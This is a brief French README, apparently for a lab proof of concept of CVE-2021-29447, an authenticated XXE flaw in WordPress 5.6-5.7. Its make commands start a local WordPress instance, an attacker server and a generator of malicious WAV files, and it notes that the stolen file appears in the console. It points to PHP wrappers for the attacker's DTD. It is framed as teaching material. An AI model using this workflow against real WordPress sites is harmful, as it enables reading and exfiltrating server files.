
Preuve de concept pour CVE-2021-29447, une vulnérabilité XXE authentifiée dans WordPress 5.6-5.7. Inclut la configuration du laboratoire, la génération de fichiers WAV malveillants et un serveur attaquant pour des tests pédagogiques.
$ make up-wp
$ make up-mal
$ make make-wav
open http://localhost:8000/
open http://localhost:8000/wp-admin/
voir dans la console le fichier exfiltré ; il peut être décodé
informations sur les commandes possibles dans le fichier DTD de l'attaquant https://www.php.net/manual/en/wrappers.php.php